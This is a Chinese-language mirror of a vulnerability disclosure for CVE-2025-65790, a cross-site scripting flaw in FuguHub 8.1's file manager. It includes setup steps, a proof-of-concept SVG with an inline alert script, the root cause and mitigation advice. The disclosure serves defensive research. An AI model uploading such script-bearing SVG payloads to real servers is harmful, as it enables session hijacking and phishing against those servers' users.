Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790 — CVE-2025-65790的文档:FuguHub 8.1中文件管理器界面未清理SVG渲染导致的反射型XSS漏洞,包含PoC和缓解建议。 | Kitploit
工具/GitHubGitHub/hunterxxx/fuguhub-8.1-reflected-svg-xss-cve-2025-65790
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubhunterxxx/fuguhub-8.1-reflected-svg-xss-cve-2025-65790

FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790

CVE-2025-65790的文档:FuguHub 8.1中文件管理器界面未清理SVG渲染导致的反射型XSS漏洞,包含PoC和缓解建议。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
118个月前尚未审核
分享

CVE-2025-65790 - FuguHub 8.1 反射型 SVG XSS

FuguHub 中通过 SVG 渲染实现的反射型跨站脚本(XSS)

https://www.cve.org/CVERecord?id=CVE-2025-65790

本仓库记录了一个 FuguHub 8.1 中的**反射型跨站脚本(XSS)**漏洞,当通过内部文件管理器 /fs/ 界面查看包含内联 JavaScript 的 SVG 文件时,其中的脚本会被执行。

CVE 编号: CVE-2025-65790
发现者: Han Tek Foo
严重性: 高
影响: 任意 JavaScript 执行

简介

FuguHub 是由 Real Time Logic / Sesamt Data AB 开发的基于云端的媒体服务器。在对默认安装进行测试时,发现 FuguHub 内置文件管理器在处理 SVG 文件时存在一个反射型跨站脚本(XSS)漏洞。 当通过 /fs/ 界面打开 SVG 文件时,其中嵌入的恶意 JavaScript 会被自动执行。这允许远程攻击者在受害者的浏览器中执行任意 JavaScript。

测试环境

操作系统:Debian Linux(全新安装)

FuguHub 版本:截至 2025-11-12 的最新下载版本

测试的 URL:

http://127.0.0.1/fs/

FuguHub 在界面中不显示明确的版本号。测试是在直接从官方下载页面进行的干净安装上执行的。

概念验证

首先,下载并运行最新版本的 FuguHub:

wget https://fuguhub.com/install/FuguHub.linux.install

chmod +x FuguHub.linux.install

sudo ./FuguHub.linux.install

  1. 进入 Web-File-Server 部分,然后转到 Web 文件管理器:

alt text

  1. 在 Web 文件管理器中,上传 xss.svg:

alt text

  1. 成功上传 xss.svg

alt text

  1. 点击 xss.svg 后,浏览器触发 XSS,警报通过 alert(document.domain) 显示域名 "127.0.0.1",从而确认了反射型 XSS。

alt text

以下是我在 PoC 中使用的 xss.svg 代码:

root@kitploit:~
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">  
      alert(document.domain);
   </script>
</svg>

🧩 根本原因

FuguHub 直接提供 SVG 文件,未进行清理或脚本过滤。浏览器将 SVG 视为活动 XML 内容并执行内联 <script> 元素,从而导致反射型 XSS。

🛡 影响

攻击者控制的 JavaScript 执行可能导致:

  • 凭据/会话劫持(如果 cookie 未设置 HttpOnly)
  • UI 篡改、网络钓鱼
  • 在应用程序内强制用户操作
  • 跨用户攻击面扩大

🛠 缓解建议

  • 从 SVG 文件中移除 <script> 标签和事件属性
  • 禁用内联脚本执行或强制实施沙箱机制
  • 应用严格的内容安全策略(CSP)
  • 限制 SVG 上传或将其转换为光栅图像(PNG)
  • 通过 /fs/ 提供文件之前进行 SVG 清理/解析

🏷 CVE 信息

此问题已由 MITRE 分配编号 CVE-2025-65790。

为使 CVE 状态从 RESERVED → PUBLIC 转换,本仓库已作为公开参考 URL 提交给 MITRE。

致谢

发现者:
Han Tek Foo

下载工具